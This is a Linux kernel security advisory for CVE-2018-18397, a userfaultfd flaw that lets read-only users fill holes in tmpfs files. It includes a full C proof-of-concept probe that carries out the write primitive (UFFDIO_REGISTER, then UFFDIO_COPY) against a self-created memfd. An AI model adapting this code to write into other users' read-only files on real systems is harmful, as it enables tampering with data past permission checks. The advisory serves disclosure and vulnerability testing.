ASA-2018-00070 – Linux kernel: userfaultfd bypasses tmpfs file permission


Allele Security Alert

ASA-2018-00070

Identifier(s)

ASA-2018-00070, CVE-2018-18397

Title

userfaultfd bypasses tmpfs file permission

Vendor(s)

Linux Foundation

Product(s)

Linux kernel

Affected version(s)

Linux kernel versions from 4.11 (which introduced userfaultfd support for shmem and hugetlbfs) before 4.20

Linux kernel versions 4.14.x before 4.14.87
Linux kernel versions 4.19.x before 4.19.7

Fixed version(s)

Linux kernel version 4.20

Linux kernel version 4.14.87
Linux kernel version 4.19.7

Proof of concept

Yes

Description

The userfaultfd implementation in the Linux kernel mishandles access control for certain UFFDIO_ ioctl calls, as demonstrated by allowing local users to write data into holes in a tmpfs file (if the user has read-only access to that file, and that file contains holes), related to fs/userfaultfd.c and mm/userfaultfd.c.

Technical details

Using the userfaultfd API, a process can register a userfaultfd region for any VMA that passes vma_can_userfault(): it must be an anonymous VMA (->vm_ops == NULL), a hugetlb VMA (VM_HUGETLB), or a shmem VMA (->vm_ops == &shmem_vm_ops). Nothing in that check looks at whether the mapping is writable, so it is possible, for example, to register userfaultfd regions for shared read-only mappings of tmpfs files.

Afterwards, the userfaultfd API (UFFDIO_COPY) can be used on such a region to atomically write data into holes in the file's mapping, i.e. into pages that do not exist in the file's page cache yet. The copy path does not check write permission either, so this also works on read-only shared mappings: the page the kernel allocates is inserted into the file's page cache, which makes the data visible to every reader of the file, not only through the attacker's mapping.

This means that an attacker with read-only access to a tmpfs file that contains holes can write data into those holes. The fix (commit 29ec90660d68, "userfaultfd: shmem/hugetlbfs: only allow to register VM_MAYWRITE vmas") rejects userfaultfd registration of shmem and hugetlbfs VMAs that lack VM_MAYWRITE, a flag that a MAP_SHARED mapping of a file opened read-only never carries, and applies the same check in the UFFDIO_COPY path, so the ioctl no longer fills holes in files the caller cannot write.
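The two steps above, as an added example (this is the editor's probe, not the advisory's or Project Zero's proof of concept): it builds its own sparse tmpfs-backed file with memfd_create(), obtains the read-only view a user with r-- permission would have by re-opening the file through /proc, maps it PROT_READ/MAP_SHARED, registers the VMA with userfaultfd, tries to UFFDIO_COPY a page into the hole, and then checks through an ordinary read of the file whether the bytes landed. The memfd, the /proc re-open, the 'A' fill pattern and the UFFD_USER_MODE_ONLY fallback for kernels with vm.unprivileged_userfaultfd=0 are this example's own choices; the names probe_cve_2018_18397, make_sparse_shmem_file and page_is_hole are hypothetical. It only ever writes into its own private memfd, so it is safe to run on a live system.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/userfaultfd.h>

#ifndef UFFD_USER_MODE_ONLY
#define UFFD_USER_MODE_ONLY 1 /* uapi value; the flag exists since Linux 5.11 */
#endif

enum probe_result { PROBE_UNAVAILABLE = 0, PROBE_FIXED = 1, PROBE_VULNERABLE = 2 };

/* Constructed target: a shmem (tmpfs-backed) file of `len` bytes that is one big
 * hole. memfd_create() gives an anonymous tmpfs inode, ftruncate() grows it
 * without allocating a page. Returns a read-write fd, or -1. */
int make_sparse_shmem_file(size_t len)
{
    int fd = memfd_create("cve-2018-18397-probe", MFD_CLOEXEC);
    if (fd >= 0 && ftruncate(fd, (off_t)len) < 0) { close(fd); fd = -1; }
    return fd;
}

/* 1 if the page at `off` is a hole (ENXIO: no data at or after off), 0 if it
 * holds data, -1 if SEEK_DATA is unusable on this fd. */
int page_is_hole(int fd, off_t off, size_t pagesize)
{
    off_t next = lseek(fd, off, SEEK_DATA);
    if (next < 0) return errno == ENXIO ? 1 : -1;
    return next >= off + (off_t)pagesize;
}

/* glibc has no userfaultfd() wrapper. With vm.unprivileged_userfaultfd=0 (the
 * default since 5.11) the plain call fails with EPERM; UFFD_USER_MODE_ONLY is
 * still allowed unprivileged and is all a user-mode-only probe needs. */
static int open_userfaultfd(void)
{
    int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0 && errno == EPERM)
        uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
    return uffd;
}

enum probe_result probe_cve_2018_18397(void)
{
    size_t pagesize = (size_t)sysconf(_SC_PAGESIZE), len = 2 * pagesize;
    enum probe_result result = PROBE_UNAVAILABLE;
    int rw_fd = -1, ro_fd = -1, uffd = -1; char path[64];
    void *map = MAP_FAILED; unsigned char *src = NULL, *back = NULL;

    if ((rw_fd = make_sparse_shmem_file(len)) < 0) goto out;
    if (page_is_hole(rw_fd, 0, pagesize) == 0) goto out;  /* precondition: a hole */
    /* The view of a user with r-- permission: the same inode opened O_RDONLY (via
     * /proc, as a memfd has no path). For a read-only file do_mmap() clears
     * VM_MAYWRITE on the MAP_SHARED VMA, which is the flag the fix checks. */
    snprintf(path, sizeof path, "/proc/self/fd/%d", rw_fd);
    if ((ro_fd = open(path, O_RDONLY | O_CLOEXEC)) < 0) goto out;
    if ((map = mmap(NULL, len, PROT_READ, MAP_SHARED, ro_fd, 0)) == MAP_FAILED) goto out;
    if ((uffd = open_userfaultfd()) < 0) goto out;
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    if (ioctl(uffd, UFFDIO_API, &api) < 0) goto out;

    /* Step 1 of the advisory: register the shmem VMA. vma_can_userfault()
     * accepts it; a fixed kernel refuses it because VM_MAYWRITE is missing. */
    struct uffdio_register reg = { .range = { .start = (unsigned long)map, .len = len },
                                   .mode = UFFDIO_REGISTER_MODE_MISSING };
    if (ioctl(uffd, UFFDIO_REGISTER, &reg) < 0) { result = PROBE_FIXED; goto out; }
    /* From here on a touch of `map` would block in a userfault nobody resolves,
     * so the file is only inspected through descriptors. Step 2: UFFDIO_COPY a
     * page of 'A's into the missing (hole) page at offset 0. */
    if (!(src = malloc(pagesize)) || !(back = malloc(pagesize))) goto out;
    memset(src, 'A', pagesize);
    struct uffdio_copy cp = { .dst = (unsigned long)map, .src = (unsigned long)src,
                              .len = pagesize, .mode = 0 };
    if (ioctl(uffd, UFFDIO_COPY, &cp) < 0 || cp.copy != (__s64)pagesize) { result = PROBE_FIXED; goto out; }
    /* Vulnerable iff the page landed in the file's page cache: an ordinary read
     * of the file (not of the mapping) now returns the copied bytes. */
    result = (pread(rw_fd, back, pagesize, 0) == (ssize_t)pagesize &&
              memcmp(back, src, pagesize) == 0) ? PROBE_VULNERABLE : PROBE_FIXED;
out:
    free(src); free(back);
    if (map != MAP_FAILED) munmap(map, len);
    if (uffd >= 0) close(uffd);
    if (ro_fd >= 0) close(ro_fd);
    if (rw_fd >= 0) close(rw_fd);
    return result;
}

int main(void)
{
    enum probe_result r = probe_cve_2018_18397();
    printf("CVE-2018-18397 probe: %s\n", r == PROBE_VULNERABLE ? "VULNERABLE (hole in a read-only file filled)"
           : r == PROBE_FIXED ? "fixed (registration or copy refused)" : "unavailable (memfd/userfaultfd not usable here)");
    return r == PROBE_VULNERABLE;
}
```

Build with `cc -Wall -O2 probe.c -o probe` (it needs the kernel UAPI header linux/userfaultfd.h); exit status 1 means the hole was filled. A fixed kernel already answers at UFFDIO_REGISTER, which the probe reports as fixed. "Unavailable" only means that one of the preconditions (memfd, the /proc re-open, a usable userfaultfd) could not be met in this environment, not that the kernel is safe; on a pre-5.11 kernel, or one with vm.unprivileged_userfaultfd=1, an unprivileged user gets the full answer.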

Credits

Jann Horn (Google Project Zero)

Reference(s)

Linux: userfaultfd bypasses tmpfs file permissions
https://bugs.chromium.org/p/project-zero/issues/detail?id=1700

Linux kernel: userfaultfd bypasses tmpfs file permissions (CVE-2018-18397; since 4.11; fixed in 4.14.87 and 4.19.7)
https://seclists.org/oss-sec/2018/q4/219

userfaultfd: shmem/hugetlbfs: only allow to register VM_MAYWRITE vmas
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=29ec90660d68bbdd69507c1c8b4e33aa299278b1

hugetlb: implement memfd sealing
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ff62a34210441103108d435ae8a00a777c4dcb99

userfaultfd: shmem/hugetlbfs: only allow to register VM_MAYWRITE vmas
https://github.com/torvalds/linux/commit/29ec90660d68bbdd69507c1c8b4e33aa299278b1

hugetlb: implement memfd sealing
https://github.com/torvalds/linux/commit/ff62a34210441103108d435ae8a00a777c4dcb99

Linux 4.20
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20

Linux 4.19.7
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.7

Linux 4.14.87
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.87

CVE-2018-18397 - Red Hat Customer Portal
https://access.redhat.com/security/cve/CVE-2018-18397

CVE-2018-18397 in Ubuntu
https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18397.html

CVE-2018-18397
https://security-tracker.debian.org/tracker/CVE-2018-18397

CVE-2018-18397 | SUSE
https://www.suse.com/security/cve/CVE-2018-18397

CVE-2018-18397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18397

CVE-2018-18397
https://nvd.nist.gov/vuln/detail/CVE-2018-18397

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: November 29, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.